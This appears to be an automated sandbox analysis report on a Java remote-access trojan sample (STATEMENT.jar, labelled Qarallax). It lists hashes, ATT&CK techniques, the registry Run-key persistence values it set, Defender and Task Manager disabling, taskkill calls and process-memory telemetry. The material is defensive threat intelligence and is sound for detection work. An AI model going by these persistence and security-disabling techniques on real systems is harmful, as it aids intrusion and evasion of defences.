qarallax | af2282169fd256121196373e4a1171e44ab0dd830ffd5f2b49f5b5d0a9f6b473

Analysis

max time kernel
149s
max time network
154s
platform
windows7_x64
resource
win7
submitted
06-08-2020 07:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

STATEMENT.jar
Size

410KB
MD5

c97cbc1f72a7a3100781e9e9dd0726c9
SHA1

cfd2845d70ba1de8fa041c844deacf5f72d360b2
SHA256

af2282169fd256121196373e4a1171e44ab0dd830ffd5f2b49f5b5d0a9f6b473
SHA512

0592feef2b9dfeeb87fd8dec6682664dbacfd4ec70e7e52d0dd08b39ba3590af4662c0cc5236bbd334e5b06c8a1207d06341b104000d889ebb6454ac2d18f9ba

Score

10^/10

persistence evasion trojan qarallax

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

resource	yara_rule
behavioral1/files/0x0003000000013538-7.dat	qarallax_dll

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
900	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\EfAgwmH = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\hmJMe\\Lwqbj.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\EfAgwmH = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\hmJMe\\Lwqbj.class\""	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\hmJMe\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\hmJMe\Desktop.ini	java.exe
File created	C:\Users\Admin\hmJMe\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\hmJMe\Desktop.ini	attrib.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\zDmSE	java.exe
File opened for modification	C:\Windows\System32\zDmSE	java.exe

Kills process with taskkill 19 IoCs

evasion

pid	Process
1692	taskkill.exe
1572	taskkill.exe
848	taskkill.exe
1624	taskkill.exe
1808	taskkill.exe
760	taskkill.exe
1940	taskkill.exe
1560	taskkill.exe
2032	taskkill.exe
1992	taskkill.exe
1844	taskkill.exe
1880	taskkill.exe
2032	taskkill.exe
1560	taskkill.exe
1384	taskkill.exe
1952	taskkill.exe
1380	taskkill.exe
1904	taskkill.exe
1980	taskkill.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1892	powershell.exe
1892	powershell.exe

Suspicious use of AdjustPrivilegeToken 100 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1036	WMIC.exe
Token: SeSecurityPrivilege	1036	WMIC.exe
Token: SeTakeOwnershipPrivilege	1036	WMIC.exe
Token: SeLoadDriverPrivilege	1036	WMIC.exe
Token: SeSystemProfilePrivilege	1036	WMIC.exe
Token: SeSystemtimePrivilege	1036	WMIC.exe
Token: SeProfSingleProcessPrivilege	1036	WMIC.exe
Token: SeIncBasePriorityPrivilege	1036	WMIC.exe
Token: SeCreatePagefilePrivilege	1036	WMIC.exe
Token: SeBackupPrivilege	1036	WMIC.exe
Token: SeRestorePrivilege	1036	WMIC.exe
Token: SeShutdownPrivilege	1036	WMIC.exe
Token: SeDebugPrivilege	1036	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1036	WMIC.exe
Token: SeRemoteShutdownPrivilege	1036	WMIC.exe
Token: SeUndockPrivilege	1036	WMIC.exe
Token: SeManageVolumePrivilege	1036	WMIC.exe
Token: 33	1036	WMIC.exe
Token: 34	1036	WMIC.exe
Token: 35	1036	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1036	WMIC.exe
Token: SeSecurityPrivilege	1036	WMIC.exe
Token: SeTakeOwnershipPrivilege	1036	WMIC.exe
Token: SeLoadDriverPrivilege	1036	WMIC.exe
Token: SeSystemProfilePrivilege	1036	WMIC.exe
Token: SeSystemtimePrivilege	1036	WMIC.exe
Token: SeProfSingleProcessPrivilege	1036	WMIC.exe
Token: SeIncBasePriorityPrivilege	1036	WMIC.exe
Token: SeCreatePagefilePrivilege	1036	WMIC.exe
Token: SeBackupPrivilege	1036	WMIC.exe
Token: SeRestorePrivilege	1036	WMIC.exe
Token: SeShutdownPrivilege	1036	WMIC.exe
Token: SeDebugPrivilege	1036	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1036	WMIC.exe
Token: SeRemoteShutdownPrivilege	1036	WMIC.exe
Token: SeUndockPrivilege	1036	WMIC.exe
Token: SeManageVolumePrivilege	1036	WMIC.exe
Token: 33	1036	WMIC.exe
Token: 34	1036	WMIC.exe
Token: 35	1036	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1536	WMIC.exe
Token: SeSecurityPrivilege	1536	WMIC.exe
Token: SeTakeOwnershipPrivilege	1536	WMIC.exe
Token: SeLoadDriverPrivilege	1536	WMIC.exe
Token: SeSystemProfilePrivilege	1536	WMIC.exe
Token: SeSystemtimePrivilege	1536	WMIC.exe
Token: SeProfSingleProcessPrivilege	1536	WMIC.exe
Token: SeIncBasePriorityPrivilege	1536	WMIC.exe
Token: SeCreatePagefilePrivilege	1536	WMIC.exe
Token: SeBackupPrivilege	1536	WMIC.exe
Token: SeRestorePrivilege	1536	WMIC.exe
Token: SeShutdownPrivilege	1536	WMIC.exe
Token: SeDebugPrivilege	1536	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1536	WMIC.exe
Token: SeRemoteShutdownPrivilege	1536	WMIC.exe
Token: SeUndockPrivilege	1536	WMIC.exe
Token: SeManageVolumePrivilege	1536	WMIC.exe
Token: 33	1536	WMIC.exe
Token: 34	1536	WMIC.exe
Token: 35	1536	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1536	WMIC.exe
Token: SeSecurityPrivilege	1536	WMIC.exe
Token: SeTakeOwnershipPrivilege	1536	WMIC.exe
Token: SeLoadDriverPrivilege	1536	WMIC.exe
Token: SeSystemProfilePrivilege	1536	WMIC.exe
Token: SeSystemtimePrivilege	1536	WMIC.exe
Token: SeProfSingleProcessPrivilege	1536	WMIC.exe
Token: SeIncBasePriorityPrivilege	1536	WMIC.exe
Token: SeCreatePagefilePrivilege	1536	WMIC.exe
Token: SeBackupPrivilege	1536	WMIC.exe
Token: SeRestorePrivilege	1536	WMIC.exe
Token: SeShutdownPrivilege	1536	WMIC.exe
Token: SeDebugPrivilege	1536	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1536	WMIC.exe
Token: SeRemoteShutdownPrivilege	1536	WMIC.exe
Token: SeUndockPrivilege	1536	WMIC.exe
Token: SeManageVolumePrivilege	1536	WMIC.exe
Token: 33	1536	WMIC.exe
Token: 34	1536	WMIC.exe
Token: 35	1536	WMIC.exe
Token: SeDebugPrivilege	1940	taskkill.exe
Token: SeDebugPrivilege	1692	taskkill.exe
Token: SeDebugPrivilege	1624	taskkill.exe
Token: SeDebugPrivilege	1572	taskkill.exe
Token: SeDebugPrivilege	1892	powershell.exe
Token: SeDebugPrivilege	848	taskkill.exe
Token: SeDebugPrivilege	1808	taskkill.exe
Token: SeDebugPrivilege	1560	taskkill.exe
Token: SeDebugPrivilege	1952	taskkill.exe
Token: SeDebugPrivilege	2032	taskkill.exe
Token: SeDebugPrivilege	760	taskkill.exe
Token: SeDebugPrivilege	1992	taskkill.exe
Token: SeDebugPrivilege	1380	taskkill.exe
Token: SeDebugPrivilege	1844	taskkill.exe
Token: SeDebugPrivilege	1880	taskkill.exe
Token: SeDebugPrivilege	2032	taskkill.exe
Token: SeDebugPrivilege	1904	taskkill.exe
Token: SeDebugPrivilege	1560	taskkill.exe
Token: SeDebugPrivilege	1980	taskkill.exe
Token: SeDebugPrivilege	1384	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
900	java.exe

Suspicious use of WriteProcessMemory 798 IoCs

description	pid	Process	procid_target
PID 900 wrote to memory of 796	900	java.exe	25
PID 900 wrote to memory of 796	900	java.exe	25
PID 900 wrote to memory of 796	900	java.exe	25
PID 900 wrote to memory of 612	900	java.exe	26
PID 900 wrote to memory of 612	900	java.exe	26
PID 900 wrote to memory of 612	900	java.exe	26
PID 612 wrote to memory of 1036	612	cmd.exe	27
PID 612 wrote to memory of 1036	612	cmd.exe	27
PID 612 wrote to memory of 1036	612	cmd.exe	27
PID 900 wrote to memory of 1100	900	java.exe	28
PID 900 wrote to memory of 1100	900	java.exe	28
PID 900 wrote to memory of 1100	900	java.exe	28
PID 1100 wrote to memory of 1536	1100	cmd.exe	29
PID 1100 wrote to memory of 1536	1100	cmd.exe	29
PID 1100 wrote to memory of 1536	1100	cmd.exe	29
PID 900 wrote to memory of 1836	900	java.exe	30
PID 900 wrote to memory of 1836	900	java.exe	30
PID 900 wrote to memory of 1836	900	java.exe	30
PID 900 wrote to memory of 1852	900	java.exe	31
PID 900 wrote to memory of 1852	900	java.exe	31
PID 900 wrote to memory of 1852	900	java.exe	31
PID 900 wrote to memory of 1260	900	java.exe	32
PID 900 wrote to memory of 1260	900	java.exe	32
PID 900 wrote to memory of 1260	900	java.exe	32
PID 900 wrote to memory of 1804	900	java.exe	33
PID 900 wrote to memory of 1804	900	java.exe	33
PID 900 wrote to memory of 1804	900	java.exe	33
PID 900 wrote to memory of 1796	900	java.exe	34
PID 900 wrote to memory of 1796	900	java.exe	34
PID 900 wrote to memory of 1796	900	java.exe	34
PID 900 wrote to memory of 1784	900	java.exe	35
PID 900 wrote to memory of 1784	900	java.exe	35
PID 900 wrote to memory of 1784	900	java.exe	35
PID 900 wrote to memory of 1764	900	java.exe	36
PID 900 wrote to memory of 1764	900	java.exe	36
PID 900 wrote to memory of 1764	900	java.exe	36
PID 900 wrote to memory of 1876	900	java.exe	37
PID 900 wrote to memory of 1876	900	java.exe	37
PID 900 wrote to memory of 1876	900	java.exe	37
PID 900 wrote to memory of 1560	900	java.exe	38
PID 900 wrote to memory of 1560	900	java.exe	38
PID 900 wrote to memory of 1560	900	java.exe	38
PID 900 wrote to memory of 1892	900	java.exe	39
PID 900 wrote to memory of 1892	900	java.exe	39
PID 900 wrote to memory of 1892	900	java.exe	39
PID 900 wrote to memory of 1940	900	java.exe	40
PID 900 wrote to memory of 1940	900	java.exe	40
PID 900 wrote to memory of 1940	900	java.exe	40
PID 900 wrote to memory of 1904	900	java.exe	42
PID 900 wrote to memory of 1904	900	java.exe	42
PID 900 wrote to memory of 1904	900	java.exe	42
PID 900 wrote to memory of 1928	900	java.exe	43
PID 900 wrote to memory of 1928	900	java.exe	43
PID 900 wrote to memory of 1928	900	java.exe	43
PID 1560 wrote to memory of 1988	1560	cmd.exe	44
PID 1560 wrote to memory of 1988	1560	cmd.exe	44
PID 1560 wrote to memory of 1988	1560	cmd.exe	44
PID 900 wrote to memory of 1944	900	java.exe	47
PID 900 wrote to memory of 1944	900	java.exe	47
PID 900 wrote to memory of 1944	900	java.exe	47
PID 900 wrote to memory of 1032	900	java.exe	49
PID 900 wrote to memory of 1032	900	java.exe	49
PID 900 wrote to memory of 1032	900	java.exe	49
PID 900 wrote to memory of 2040	900	java.exe	52
PID 900 wrote to memory of 2040	900	java.exe	52
PID 900 wrote to memory of 2040	900	java.exe	52
PID 900 wrote to memory of 1504	900	java.exe	53
PID 900 wrote to memory of 1504	900	java.exe	53
PID 900 wrote to memory of 1504	900	java.exe	53
PID 900 wrote to memory of 592	900	java.exe	54
PID 900 wrote to memory of 592	900	java.exe	54
PID 900 wrote to memory of 592	900	java.exe	54
PID 1560 wrote to memory of 776	1560	cmd.exe	55
PID 1560 wrote to memory of 776	1560	cmd.exe	55
PID 1560 wrote to memory of 776	1560	cmd.exe	55
PID 900 wrote to memory of 1168	900	java.exe	57
PID 900 wrote to memory of 1168	900	java.exe	57
PID 900 wrote to memory of 1168	900	java.exe	57
PID 900 wrote to memory of 1052	900	java.exe	60
PID 900 wrote to memory of 1052	900	java.exe	60
PID 900 wrote to memory of 1052	900	java.exe	60
PID 900 wrote to memory of 1532	900	java.exe	62
PID 900 wrote to memory of 1532	900	java.exe	62
PID 900 wrote to memory of 1532	900	java.exe	62
PID 900 wrote to memory of 1488	900	java.exe	63
PID 900 wrote to memory of 1488	900	java.exe	63
PID 900 wrote to memory of 1488	900	java.exe	63
PID 900 wrote to memory of 1704	900	java.exe	66
PID 900 wrote to memory of 1704	900	java.exe	66
PID 900 wrote to memory of 1704	900	java.exe	66
PID 900 wrote to memory of 1788	900	java.exe	68
PID 900 wrote to memory of 1788	900	java.exe	68
PID 900 wrote to memory of 1788	900	java.exe	68
PID 900 wrote to memory of 1692	900	java.exe	69
PID 900 wrote to memory of 1692	900	java.exe	69
PID 900 wrote to memory of 1692	900	java.exe	69
PID 900 wrote to memory of 1896	900	java.exe	72
PID 900 wrote to memory of 1896	900	java.exe	72
PID 900 wrote to memory of 1896	900	java.exe	72
PID 900 wrote to memory of 1952	900	java.exe	73
PID 900 wrote to memory of 1952	900	java.exe	73
PID 900 wrote to memory of 1952	900	java.exe	73
PID 900 wrote to memory of 544	900	java.exe	76
PID 900 wrote to memory of 544	900	java.exe	76
PID 900 wrote to memory of 544	900	java.exe	76
PID 900 wrote to memory of 1976	900	java.exe	78
PID 900 wrote to memory of 1976	900	java.exe	78
PID 900 wrote to memory of 1976	900	java.exe	78
PID 900 wrote to memory of 1032	900	java.exe	79
PID 900 wrote to memory of 1032	900	java.exe	79
PID 900 wrote to memory of 1032	900	java.exe	79
PID 900 wrote to memory of 1572	900	java.exe	82
PID 900 wrote to memory of 1572	900	java.exe	82
PID 900 wrote to memory of 1572	900	java.exe	82
PID 900 wrote to memory of 1296	900	java.exe	83
PID 900 wrote to memory of 1296	900	java.exe	83
PID 900 wrote to memory of 1296	900	java.exe	83
PID 900 wrote to memory of 1680	900	java.exe	86
PID 900 wrote to memory of 1680	900	java.exe	86
PID 900 wrote to memory of 1680	900	java.exe	86
PID 900 wrote to memory of 1936	900	java.exe	87
PID 900 wrote to memory of 1936	900	java.exe	87
PID 900 wrote to memory of 1936	900	java.exe	87
PID 900 wrote to memory of 1760	900	java.exe	90
PID 900 wrote to memory of 1760	900	java.exe	90
PID 900 wrote to memory of 1760	900	java.exe	90
PID 900 wrote to memory of 1632	900	java.exe	91
PID 900 wrote to memory of 1632	900	java.exe	91
PID 900 wrote to memory of 1632	900	java.exe	91
PID 900 wrote to memory of 1516	900	java.exe	92
PID 900 wrote to memory of 1516	900	java.exe	92
PID 900 wrote to memory of 1516	900	java.exe	92
PID 900 wrote to memory of 1624	900	java.exe	93
PID 900 wrote to memory of 1624	900	java.exe	93
PID 900 wrote to memory of 1624	900	java.exe	93
PID 900 wrote to memory of 804	900	java.exe	96
PID 900 wrote to memory of 804	900	java.exe	96
PID 900 wrote to memory of 804	900	java.exe	96
PID 900 wrote to memory of 844	900	java.exe	99
PID 900 wrote to memory of 844	900	java.exe	99
PID 900 wrote to memory of 844	900	java.exe	99
PID 1516 wrote to memory of 1800	1516	cmd.exe	101
PID 1516 wrote to memory of 1800	1516	cmd.exe	101
PID 1516 wrote to memory of 1800	1516	cmd.exe	101
PID 900 wrote to memory of 1488	900	java.exe	102
PID 900 wrote to memory of 1488	900	java.exe	102
PID 900 wrote to memory of 1488	900	java.exe	102
PID 900 wrote to memory of 1628	900	java.exe	104
PID 900 wrote to memory of 1628	900	java.exe	104
PID 900 wrote to memory of 1628	900	java.exe	104
PID 1516 wrote to memory of 344	1516	cmd.exe	106
PID 1516 wrote to memory of 344	1516	cmd.exe	106
PID 1516 wrote to memory of 344	1516	cmd.exe	106
PID 900 wrote to memory of 1168	900	java.exe	108
PID 900 wrote to memory of 1168	900	java.exe	108
PID 900 wrote to memory of 1168	900	java.exe	108
PID 900 wrote to memory of 1312	900	java.exe	110
PID 900 wrote to memory of 1312	900	java.exe	110
PID 900 wrote to memory of 1312	900	java.exe	110
PID 900 wrote to memory of 1496	900	java.exe	113
PID 900 wrote to memory of 1496	900	java.exe	113
PID 900 wrote to memory of 1496	900	java.exe	113
PID 900 wrote to memory of 1388	900	java.exe	114
PID 900 wrote to memory of 1388	900	java.exe	114
PID 900 wrote to memory of 1388	900	java.exe	114
PID 1496 wrote to memory of 1980	1496	cmd.exe	115
PID 1496 wrote to memory of 1980	1496	cmd.exe	115
PID 1496 wrote to memory of 1980	1496	cmd.exe	115
PID 900 wrote to memory of 1932	900	java.exe	117
PID 900 wrote to memory of 1932	900	java.exe	117
PID 900 wrote to memory of 1932	900	java.exe	117
PID 1496 wrote to memory of 1112	1496	cmd.exe	118
PID 1496 wrote to memory of 1112	1496	cmd.exe	118
PID 1496 wrote to memory of 1112	1496	cmd.exe	118
PID 900 wrote to memory of 1572	900	java.exe	120
PID 900 wrote to memory of 1572	900	java.exe	120
PID 900 wrote to memory of 1572	900	java.exe	120
PID 900 wrote to memory of 1920	900	java.exe	121
PID 900 wrote to memory of 1920	900	java.exe	121
PID 900 wrote to memory of 1920	900	java.exe	121
PID 1920 wrote to memory of 1056	1920	cmd.exe	123
PID 1920 wrote to memory of 1056	1920	cmd.exe	123
PID 1920 wrote to memory of 1056	1920	cmd.exe	123
PID 1920 wrote to memory of 1564	1920	cmd.exe	124
PID 1920 wrote to memory of 1564	1920	cmd.exe	124
PID 1920 wrote to memory of 1564	1920	cmd.exe	124
PID 900 wrote to memory of 1084	900	java.exe	125
PID 900 wrote to memory of 1084	900	java.exe	125
PID 900 wrote to memory of 1084	900	java.exe	125
PID 1084 wrote to memory of 796	1084	cmd.exe	126
PID 1084 wrote to memory of 796	1084	cmd.exe	126
PID 1084 wrote to memory of 796	1084	cmd.exe	126
PID 1084 wrote to memory of 1816	1084	cmd.exe	127
PID 1084 wrote to memory of 1816	1084	cmd.exe	127
PID 1084 wrote to memory of 1816	1084	cmd.exe	127
PID 900 wrote to memory of 608	900	java.exe	128
PID 900 wrote to memory of 608	900	java.exe	128
PID 900 wrote to memory of 608	900	java.exe	128
PID 608 wrote to memory of 1644	608	cmd.exe	129
PID 608 wrote to memory of 1644	608	cmd.exe	129
PID 608 wrote to memory of 1644	608	cmd.exe	129
PID 608 wrote to memory of 1704	608	cmd.exe	130
PID 608 wrote to memory of 1704	608	cmd.exe	130
PID 608 wrote to memory of 1704	608	cmd.exe	130
PID 900 wrote to memory of 344	900	java.exe	131
PID 900 wrote to memory of 344	900	java.exe	131
PID 900 wrote to memory of 344	900	java.exe	131
PID 344 wrote to memory of 1952	344	cmd.exe	132
PID 344 wrote to memory of 1952	344	cmd.exe	132
PID 344 wrote to memory of 1952	344	cmd.exe	132
PID 344 wrote to memory of 1876	344	cmd.exe	133
PID 344 wrote to memory of 1876	344	cmd.exe	133
PID 344 wrote to memory of 1876	344	cmd.exe	133
PID 900 wrote to memory of 1904	900	java.exe	134
PID 900 wrote to memory of 1904	900	java.exe	134
PID 900 wrote to memory of 1904	900	java.exe	134
PID 900 wrote to memory of 848	900	java.exe	135
PID 900 wrote to memory of 848	900	java.exe	135
PID 900 wrote to memory of 848	900	java.exe	135
PID 1904 wrote to memory of 1944	1904	cmd.exe	137
PID 1904 wrote to memory of 1944	1904	cmd.exe	137
PID 1904 wrote to memory of 1944	1904	cmd.exe	137
PID 1904 wrote to memory of 1112	1904	cmd.exe	138
PID 1904 wrote to memory of 1112	1904	cmd.exe	138
PID 1904 wrote to memory of 1112	1904	cmd.exe	138
PID 900 wrote to memory of 1476	900	java.exe	139
PID 900 wrote to memory of 1476	900	java.exe	139
PID 900 wrote to memory of 1476	900	java.exe	139
PID 1476 wrote to memory of 1388	1476	cmd.exe	140
PID 1476 wrote to memory of 1388	1476	cmd.exe	140
PID 1476 wrote to memory of 1388	1476	cmd.exe	140
PID 1476 wrote to memory of 1368	1476	cmd.exe	141
PID 1476 wrote to memory of 1368	1476	cmd.exe	141
PID 1476 wrote to memory of 1368	1476	cmd.exe	141
PID 900 wrote to memory of 528	900	java.exe	142
PID 900 wrote to memory of 528	900	java.exe	142
PID 900 wrote to memory of 528	900	java.exe	142
PID 528 wrote to memory of 2044	528	cmd.exe	143
PID 528 wrote to memory of 2044	528	cmd.exe	143
PID 528 wrote to memory of 2044	528	cmd.exe	143
PID 528 wrote to memory of 592	528	cmd.exe	144
PID 528 wrote to memory of 592	528	cmd.exe	144
PID 528 wrote to memory of 592	528	cmd.exe	144
PID 900 wrote to memory of 1080	900	java.exe	145
PID 900 wrote to memory of 1080	900	java.exe	145
PID 900 wrote to memory of 1080	900	java.exe	145
PID 1080 wrote to memory of 1644	1080	cmd.exe	146
PID 1080 wrote to memory of 1644	1080	cmd.exe	146
PID 1080 wrote to memory of 1644	1080	cmd.exe	146
PID 1080 wrote to memory of 1968	1080	cmd.exe	147
PID 1080 wrote to memory of 1968	1080	cmd.exe	147
PID 1080 wrote to memory of 1968	1080	cmd.exe	147
PID 900 wrote to memory of 1488	900	java.exe	148
PID 900 wrote to memory of 1488	900	java.exe	148
PID 900 wrote to memory of 1488	900	java.exe	148
PID 1488 wrote to memory of 1380	1488	cmd.exe	149
PID 1488 wrote to memory of 1380	1488	cmd.exe	149
PID 1488 wrote to memory of 1380	1488	cmd.exe	149
PID 900 wrote to memory of 1808	900	java.exe	150
PID 900 wrote to memory of 1808	900	java.exe	150
PID 900 wrote to memory of 1808	900	java.exe	150
PID 1488 wrote to memory of 1840	1488	cmd.exe	152
PID 1488 wrote to memory of 1840	1488	cmd.exe	152
PID 1488 wrote to memory of 1840	1488	cmd.exe	152
PID 900 wrote to memory of 668	900	java.exe	153
PID 900 wrote to memory of 668	900	java.exe	153
PID 900 wrote to memory of 668	900	java.exe	153
PID 668 wrote to memory of 284	668	cmd.exe	154
PID 668 wrote to memory of 284	668	cmd.exe	154
PID 668 wrote to memory of 284	668	cmd.exe	154
PID 668 wrote to memory of 1576	668	cmd.exe	155
PID 668 wrote to memory of 1576	668	cmd.exe	155
PID 668 wrote to memory of 1576	668	cmd.exe	155
PID 900 wrote to memory of 1620	900	java.exe	156
PID 900 wrote to memory of 1620	900	java.exe	156
PID 900 wrote to memory of 1620	900	java.exe	156
PID 1620 wrote to memory of 776	1620	cmd.exe	157
PID 1620 wrote to memory of 776	1620	cmd.exe	157
PID 1620 wrote to memory of 776	1620	cmd.exe	157
PID 1620 wrote to memory of 1624	1620	cmd.exe	158
PID 1620 wrote to memory of 1624	1620	cmd.exe	158
PID 1620 wrote to memory of 1624	1620	cmd.exe	158
PID 900 wrote to memory of 1632	900	java.exe	159
PID 900 wrote to memory of 1632	900	java.exe	159
PID 900 wrote to memory of 1632	900	java.exe	159
PID 1632 wrote to memory of 2032	1632	cmd.exe	160
PID 1632 wrote to memory of 2032	1632	cmd.exe	160
PID 1632 wrote to memory of 2032	1632	cmd.exe	160
PID 1632 wrote to memory of 1260	1632	cmd.exe	161
PID 1632 wrote to memory of 1260	1632	cmd.exe	161
PID 1632 wrote to memory of 1260	1632	cmd.exe	161
PID 900 wrote to memory of 1964	900	java.exe	162
PID 900 wrote to memory of 1964	900	java.exe	162
PID 900 wrote to memory of 1964	900	java.exe	162
PID 1964 wrote to memory of 1980	1964	cmd.exe	163
PID 1964 wrote to memory of 1980	1964	cmd.exe	163
PID 1964 wrote to memory of 1980	1964	cmd.exe	163
PID 1964 wrote to memory of 1664	1964	cmd.exe	164
PID 1964 wrote to memory of 1664	1964	cmd.exe	164
PID 1964 wrote to memory of 1664	1964	cmd.exe	164
PID 900 wrote to memory of 764	900	java.exe	165
PID 900 wrote to memory of 764	900	java.exe	165
PID 900 wrote to memory of 764	900	java.exe	165
PID 764 wrote to memory of 1988	764	cmd.exe	166
PID 764 wrote to memory of 1988	764	cmd.exe	166
PID 764 wrote to memory of 1988	764	cmd.exe	166
PID 900 wrote to memory of 1560	900	java.exe	167
PID 900 wrote to memory of 1560	900	java.exe	167
PID 900 wrote to memory of 1560	900	java.exe	167
PID 764 wrote to memory of 1760	764	cmd.exe	169
PID 764 wrote to memory of 1760	764	cmd.exe	169
PID 764 wrote to memory of 1760	764	cmd.exe	169
PID 900 wrote to memory of 892	900	java.exe	170
PID 900 wrote to memory of 892	900	java.exe	170
PID 900 wrote to memory of 892	900	java.exe	170
PID 892 wrote to memory of 1368	892	cmd.exe	171
PID 892 wrote to memory of 1368	892	cmd.exe	171
PID 892 wrote to memory of 1368	892	cmd.exe	171
PID 892 wrote to memory of 1784	892	cmd.exe	172
PID 892 wrote to memory of 1784	892	cmd.exe	172
PID 892 wrote to memory of 1784	892	cmd.exe	172
PID 900 wrote to memory of 1932	900	java.exe	173
PID 900 wrote to memory of 1932	900	java.exe	173
PID 900 wrote to memory of 1932	900	java.exe	173
PID 1932 wrote to memory of 1412	1932	cmd.exe	174
PID 1932 wrote to memory of 1412	1932	cmd.exe	174
PID 1932 wrote to memory of 1412	1932	cmd.exe	174
PID 1932 wrote to memory of 1672	1932	cmd.exe	175
PID 1932 wrote to memory of 1672	1932	cmd.exe	175
PID 1932 wrote to memory of 1672	1932	cmd.exe	175
PID 900 wrote to memory of 1816	900	java.exe	176
PID 900 wrote to memory of 1816	900	java.exe	176
PID 900 wrote to memory of 1816	900	java.exe	176
PID 1816 wrote to memory of 1844	1816	cmd.exe	177
PID 1816 wrote to memory of 1844	1816	cmd.exe	177
PID 1816 wrote to memory of 1844	1816	cmd.exe	177
PID 1816 wrote to memory of 1968	1816	cmd.exe	178
PID 1816 wrote to memory of 1968	1816	cmd.exe	178
PID 1816 wrote to memory of 1968	1816	cmd.exe	178
PID 900 wrote to memory of 1924	900	java.exe	179
PID 900 wrote to memory of 1924	900	java.exe	179
PID 900 wrote to memory of 1924	900	java.exe	179
PID 1924 wrote to memory of 1656	1924	cmd.exe	180
PID 1924 wrote to memory of 1656	1924	cmd.exe	180
PID 1924 wrote to memory of 1656	1924	cmd.exe	180
PID 1924 wrote to memory of 1372	1924	cmd.exe	181
PID 1924 wrote to memory of 1372	1924	cmd.exe	181
PID 1924 wrote to memory of 1372	1924	cmd.exe	181
PID 900 wrote to memory of 1576	900	java.exe	182
PID 900 wrote to memory of 1576	900	java.exe	182
PID 900 wrote to memory of 1576	900	java.exe	182
PID 1576 wrote to memory of 2004	1576	cmd.exe	183
PID 1576 wrote to memory of 2004	1576	cmd.exe	183
PID 1576 wrote to memory of 2004	1576	cmd.exe	183
PID 1576 wrote to memory of 2012	1576	cmd.exe	184
PID 1576 wrote to memory of 2012	1576	cmd.exe	184
PID 1576 wrote to memory of 2012	1576	cmd.exe	184
PID 900 wrote to memory of 576	900	java.exe	185
PID 900 wrote to memory of 576	900	java.exe	185
PID 900 wrote to memory of 576	900	java.exe	185
PID 576 wrote to memory of 1100	576	cmd.exe	186
PID 576 wrote to memory of 1100	576	cmd.exe	186
PID 576 wrote to memory of 1100	576	cmd.exe	186
PID 576 wrote to memory of 1572	576	cmd.exe	187
PID 576 wrote to memory of 1572	576	cmd.exe	187
PID 576 wrote to memory of 1572	576	cmd.exe	187
PID 900 wrote to memory of 1952	900	java.exe	188
PID 900 wrote to memory of 1952	900	java.exe	188
PID 900 wrote to memory of 1952	900	java.exe	188
PID 900 wrote to memory of 1312	900	java.exe	189
PID 900 wrote to memory of 1312	900	java.exe	189
PID 900 wrote to memory of 1312	900	java.exe	189
PID 1312 wrote to memory of 1696	1312	cmd.exe	191
PID 1312 wrote to memory of 1696	1312	cmd.exe	191
PID 1312 wrote to memory of 1696	1312	cmd.exe	191
PID 1312 wrote to memory of 1948	1312	cmd.exe	192
PID 1312 wrote to memory of 1948	1312	cmd.exe	192
PID 1312 wrote to memory of 1948	1312	cmd.exe	192
PID 900 wrote to memory of 848	900	java.exe	193
PID 900 wrote to memory of 848	900	java.exe	193
PID 900 wrote to memory of 848	900	java.exe	193
PID 848 wrote to memory of 804	848	cmd.exe	194
PID 848 wrote to memory of 804	848	cmd.exe	194
PID 848 wrote to memory of 804	848	cmd.exe	194
PID 848 wrote to memory of 1032	848	cmd.exe	195
PID 848 wrote to memory of 1032	848	cmd.exe	195
PID 848 wrote to memory of 1032	848	cmd.exe	195
PID 900 wrote to memory of 544	900	java.exe	196
PID 900 wrote to memory of 544	900	java.exe	196
PID 900 wrote to memory of 544	900	java.exe	196
PID 544 wrote to memory of 2024	544	cmd.exe	197
PID 544 wrote to memory of 2024	544	cmd.exe	197
PID 544 wrote to memory of 2024	544	cmd.exe	197
PID 544 wrote to memory of 1628	544	cmd.exe	198
PID 544 wrote to memory of 1628	544	cmd.exe	198
PID 544 wrote to memory of 1628	544	cmd.exe	198
PID 900 wrote to memory of 1968	900	java.exe	199
PID 900 wrote to memory of 1968	900	java.exe	199
PID 900 wrote to memory of 1968	900	java.exe	199
PID 1968 wrote to memory of 1840	1968	cmd.exe	200
PID 1968 wrote to memory of 1840	1968	cmd.exe	200
PID 1968 wrote to memory of 1840	1968	cmd.exe	200
